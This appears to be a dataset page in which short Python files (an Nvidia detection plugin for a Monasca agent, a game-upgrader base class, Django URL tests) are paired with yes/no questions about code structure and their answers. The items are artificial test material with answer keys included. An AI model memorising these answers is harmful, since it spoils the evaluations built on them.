# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import subprocess
import monasca_setup.agent_config
import monasca_setup.detection
LOG = logging.getLogger(__name__)
class NvidiaDetect(monasca_setup.detection.Plugin):
"""Detects and configures nVidia plugin."""
def _detect(self):
self.available = False
if 'nvidia' not in subprocess.check_output(
["lshw", "-C", "display"]).lower():
LOG.info('No nVidia hardware detected.')
return
self.available = True
def build_config(self):
config = monasca_setup.agent_config.Plugins()
config['nvidia'] = {
'init_config': None,
'instances': [{'name': 'nvidia_stats'}]}
return config
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | stackhpc_monasca_agent_plugins/detection/nvidia.py | stackhpc/monasca-agent-plugins |
"""
Upgrade custom's game dir to the latest version.
"""
from utils import compare_version
class BaseUpgrader(object):
"""
Upgrade a game dir from the version in [<from_version>, <to_version>) to version
<target_version>.
"""
# Can upgrade the game of version between from_version and to_version.
# min version 0.0.0 (include this version)
from_min_version = (0, 0, 0)
# from max version 0.0.0 (not include this version)
from_max_version = (0, 0, 0)
# Upgrade to the target version. None means the latest version.
target_version = None
def upgrade_game(self, game_dir, game_template, muddery_lib):
"""
Upgrade a game.
Args:
game_dir: (string) the game dir to be upgraded.
game_template: (string) the game template used to upgrade the game dir.
muddery_lib: (string) muddery's dir
"""
pass
def upgrade_data(self, data_path, game_template, muddery_lib):
"""
Upgrade game data.
Args:
data_path: (string) the data path to be upgraded.
game_template: (string) the game template used to upgrade the game dir.
muddery_lib: (string) muddery's dir
"""
pass
def can_upgrade(self, game_ver):
"""
game_version: (list)version numbers.
"""
# The game version should be equal or bigger than from_min_version.
if compare_version(game_ver, self.from_min_version) == -1:
return False
# The game version should be smaller than from_max_version.
if compare_version(game_ver, self.from_max_version) != -1:
return False
return True
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"a... | 3 | muddery/server/upgrader/base_upgrader.py | MarsZone/DreamLand |
from django.test import TestCase
from django.urls import resolve, reverse
from . import views
class TestMapUrl(TestCase):
def test_map_check_resloved(self):
url = reverse('map.check')
self.assertEqual(resolve(url).func, views.check)
def test_map_fetch_resloved(self):
url = reverse('map.fetch')
self.assertEqual(resolve(url).func, views.fetch)
def test_map_test_resloved(self):
url = reverse('map.test')
self.assertEqual(resolve(url).func, views.test)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answ... | 3 | map/tests.py | Code-and-Response/ISAC-SIMO-Repo-2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.